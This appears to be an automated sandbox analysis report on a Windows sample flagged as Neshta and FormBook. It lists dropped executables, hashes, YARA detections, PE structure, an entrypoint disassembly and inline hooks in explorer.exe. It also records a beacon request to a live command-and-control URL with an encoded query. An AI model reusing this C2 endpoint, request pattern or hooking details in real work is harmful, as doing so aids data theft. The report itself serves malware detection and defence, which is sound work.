SHA-512: 6BE82945EAB1E9FD9BA507045B6B45799AFD11F5A3A30949E03FA100F93750DD0ECEBECABDB1883B764C90791ABED09EE191588BB8A8241AC6A6AFAAA120C169
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
Process: C:\Windows\svchost.com
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.57605386644689
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCMfSoIt2ZzzV9uc1EshwMDkEcAv4i+:sr85Cnkz//1DgEcAv5+
MD5: 100E15577B28178663E63AB854D28B4A
SHA1: DC7D931ECDA8C09D0D2B43988E6D689A20E080F1
SHA-256: 238254BCE07446426D478897AC3DE27DE2B9606B2E8477F7DDAF8A20A2999FC4
SHA-512: 5F5A2C7F553B747A9A1811E9D4D3A0BDA525D5977D5BB709F65164308E020B31A7EC0029C435D8F05E46E737242BB5F934D0094728841F6C545E15C625444C47
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
Process: C:\Windows\svchost.com
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 4.744720269791172
Encrypted: false
SSDEEP: 768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJozp/q4:JxqjQ+P04wsmJCV/Z
MD5: 316C81CA54C5FAC241D16CA25E7B341C
SHA1: 9E1199BCB359EA9146EAD52E765F3913A791CD7A
SHA-256: 9CE3D752106B78CBB5CF3DF574CD084177C4CF97FF35CC6E983EAD6F4A3F6CE1
SHA-512: CEC15054D8351322566F67B46B333F11064CB650D4ADDCDBC9174C66EE4E4D4F1C3400FDE6BBDCD3B632ED051C92E898C5170B1A6504BB11A771230D4EA15D3F
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
Process: C:\Windows\svchost.com
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.422024969420582
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCjMnNFZnBeGI9cKm8q3+i2PPvfKLD1D9nwt:sr85CMBeLsOBXiN9nwt
MD5: 62F99051442ED97159B8D9CC03BBF8DC
SHA1: E22CF810217DFC5700C2C629162EF37CA672C957
SHA-256: C83C04BB7EBAC75F623938C167AD7F09606F2E0B786A1CCAFA12E080F9455E9A
SHA-512: FE259BC5D8C12884C403B4F08E00272DEBFEECEDF5F9230F8B0A3B6DE100D58AEC610B849DFFD94568A44389FACAF7B55B1631F9AA51BD91B7C1F3C91408619A
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.789687408663417
TrID:
• Win32 Executable (generic) a (10002005/4) 97.38%
• Win32 Executable Borland Delphi 6 (262906/60) 2.56%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: vi0EwpbUht.exe
File size: 284661
MD5: f478c15f5affd8359762b8c6b0e913a4
SHA1: 05b36949abd35a132488158f38149c7b582c8d3a
SHA256: e355ac0da4996011e91f28b11e03c44d54606ae4ceb0bc4f6d0a0edc4b3410ed
SHA512: 31f7f6d622fc730d5822f40a75e08fc2a48001f8cd696d4d3cb0ebebd45904f4bcc7f8b8dad0866a78baa056316b53d8d2c3b3298c5e0ec441a0fe202e350895
SSDEEP: 6144:k923CstoxrFKLP+BFY0GfiqlMthQtpAEQq+6:nyYbyuiqS176
File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x4080e4
Entrypoint Section: CODE
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 9f4693fc0c511135129493f2161d1e86

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFE0h
xor eax, eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-1Ch], eax
mov dword ptr [ebp-14h], eax
mov eax, 00408054h
call 00007F8318365847h
xor eax, eax
push ebp
push 00408220h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
mov eax, 004091A8h
mov ecx, 0000000Bh
mov edx, 0000000Bh
call 00007F8318368991h
mov eax, 004091B4h
mov ecx, 00000009h
mov edx, 00000009h
call 00007F831836897Dh
mov eax, 004091C0h
mov ecx, 00000003h
mov edx, 00000003h
call 00007F8318368969h
mov eax, 004091DCh
mov ecx, 00000003h
mov edx, 00000003h
call 00007F8318368955h
mov eax, dword ptr [00409210h]
mov ecx, 0000000Bh
mov edx, 0000000Bh
call 00007F8318368941h
call 00007F8318368998h
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F8318366282h
mov eax, dword ptr [ebp-14h]
call 00007F8318366816h
cmp eax, 0000A200h
jle 00007F8318369A37h
call 00007F8318368F16h
call 00007F8318369729h
mov eax, 004091C4h
mov ecx, 00000003h
mov edx, 00000003h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15000 | 0x864 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19000 | 0x1400 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18000 | 0x5cc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x17000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x722c | 0x7400 | False | 0.617355872845 | data | 6.51167217489 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA | 0x9000 | 0x218 | 0x400 | False | 0.3623046875 | data | 3.15169834056 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS | 0xa000 | 0xa899 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata | 0x15000 | 0x864 | 0xa00 | False | 0.37421875 | data | 4.17385976895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls | 0x16000 | 0x8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata | 0x17000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.206920017787 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x18000 | 0x5cc | 0x600 | False | 0.848307291667 | data | 6.44309346589 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x19000 | 0x1400 | 0x1400 | False | 0.2041015625 | data | 2.6426621724 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x19150 | 0x10a8 | data | Russian | Russia
RT_RCDATA | 0x1a1f8 | 0x10 | data | |
RT_RCDATA | 0x1a208 | 0xac | data | |
RT_GROUP_ICON | 0x1a2b4 | 0x14 | data | Russian | Russia

Imports

DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll | GetKeyboardType, MessageBoxA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | WriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
gdi32.dll | StretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
user32.dll | ReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
shell32.dll | ShellExecuteA, ExtractIconA

Possible Origin

Language of compilation system | Country where language is spoken
Russian | Russia

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/10/21-20:54:57.211914 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49753 | 34.102.136.180 | 192.168.2.6

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 10, 2021 20:54:57.030077934 CEST | 49753 | 80 | 192.168.2.6 | 34.102.136.180
Jun 10, 2021 20:54:57.072468996 CEST | 80 | 49753 | 34.102.136.180 | 192.168.2.6
Jun 10, 2021 20:54:57.072818995 CEST | 49753 | 80 | 192.168.2.6 | 34.102.136.180
Jun 10, 2021 20:54:57.072968960 CEST | 49753 | 80 | 192.168.2.6 | 34.102.136.180
Jun 10, 2021 20:54:57.116158962 CEST | 80 | 49753 | 34.102.136.180 | 192.168.2.6
Jun 10, 2021 20:54:57.211914062 CEST | 80 | 49753 | 34.102.136.180 | 192.168.2.6
Jun 10, 2021 20:54:57.211961985 CEST | 80 | 49753 | 34.102.136.180 | 192.168.2.6
Jun 10, 2021 20:54:57.213359118 CEST | 49753 | 80 | 192.168.2.6 | 34.102.136.180
Jun 10, 2021 20:54:57.213489056 CEST | 49753 | 80 | 192.168.2.6 | 34.102.136.180
Jun 10, 2021 20:54:57.255644083 CEST | 80 | 49753 | 34.102.136.180 | 192.168.2.6

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 10, 2021 20:52:56.466655016 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:52:56.516782045 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:52:57.555850029 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:52:57.606200933 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:52:58.671271086 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:52:58.729799986 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:52:59.605499029 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:52:59.655922890 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:00.397624016 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:00.450397968 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:01.908998013 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:01.959418058 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:02.707798004 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:02.758057117 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:03.849318981 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:03.899388075 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:06.596693039 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:06.655294895 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:07.859206915 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:07.921375036 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:09.044658899 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:09.104645014 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:10.205240011 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:10.258629084 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:12.100763083 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:12.153758049 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:13.241920948 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:13.294929028 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:14.121953011 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:14.183816910 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:15.152836084 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:15.211072922 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:16.731596947 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:16.792953014 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:30.056799889 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:30.125757933 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:51.309299946 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:51.369638920 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:53:51.744307041 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:53:51.818675995 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:02.000946999 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:02.061093092 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:06.364775896 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:06.521516085 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:07.205995083 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:07.366110086 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:07.993515015 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:08.060493946 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:08.428529024 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:08.492145061 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:09.036667109 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:09.098541021 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:10.033778906 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:10.095422983 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:10.859957933 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:10.918298960 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:11.751101017 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:11.804127932 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:12.925803900 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:12.979228973 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:16.933178902 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:16.994709015 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:17.769121885 CEST | 56129 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:17.828820944 CEST | 53 | 56129 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:39.738754034 CEST | 58177 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:39.799232960 CEST | 53 | 58177 | 8.8.8.8 | 192.168.2.6
Jun 10, 2021 20:54:56.943981886 CEST | 50700 | 53 | 192.168.2.6 | 8.8.8.8
Jun 10, 2021 20:54:57.021190882 CEST | 53 | 50700 | 8.8.8.8 | 192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 10, 2021 20:54:56.943981886 CEST | 192.168.2.6 | 8.8.8.8 | 0x2681 | Standard query (0) | www.agileintelligence.coach | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 10, 2021 20:54:57.021190882 CEST | 8.8.8.8 | 192.168.2.6 | 0x2681 | No error (0) | www.agileintelligence.coach | agileintelligence.coach | - | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 20:54:57.021190882 CEST | 8.8.8.8 | 192.168.2.6 | 0x2681 | No error (0) | agileintelligence.coach | - | 34.102.136.180 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.agileintelligence.coach

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49753 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 10, 2021 20:54:57.072968960 CEST | 5532 | OUT | GET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1
Host: www.agileintelligence.coach
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 10, 2021 20:54:57.211914062 CEST | 5533 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 10 Jun 2021 18:54:57 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60ba413e-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEB
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEB

Statistics

Behavior

System Behavior

General

Start time: 20:53:02
Start date: 10/06/2021
Path: C:\Users\user\Desktop\vi0EwpbUht.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\vi0EwpbUht.exe'
Imagebase: 0x400000
File size: 284661 bytes
MD5 hash: F478C15F5AFFD8359762B8C6B0E913A4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
Reputation: low

General

Start time: 20:53:04
Start date: 10/06/2021
Path: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
Imagebase: 0x400000
File size: 243189 bytes
MD5 hash: 4A10F66447AAF017229FF618AAB923E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 20:53:05
Start date: 10/06/2021
Path: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
Imagebase: 0x400000
File size: 243189 bytes
MD5 hash: 4A10F66447AAF017229FF618AAB923E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:20:53:11
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:
                                                                                                                        Imagebase:0x7ff6f22f0000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

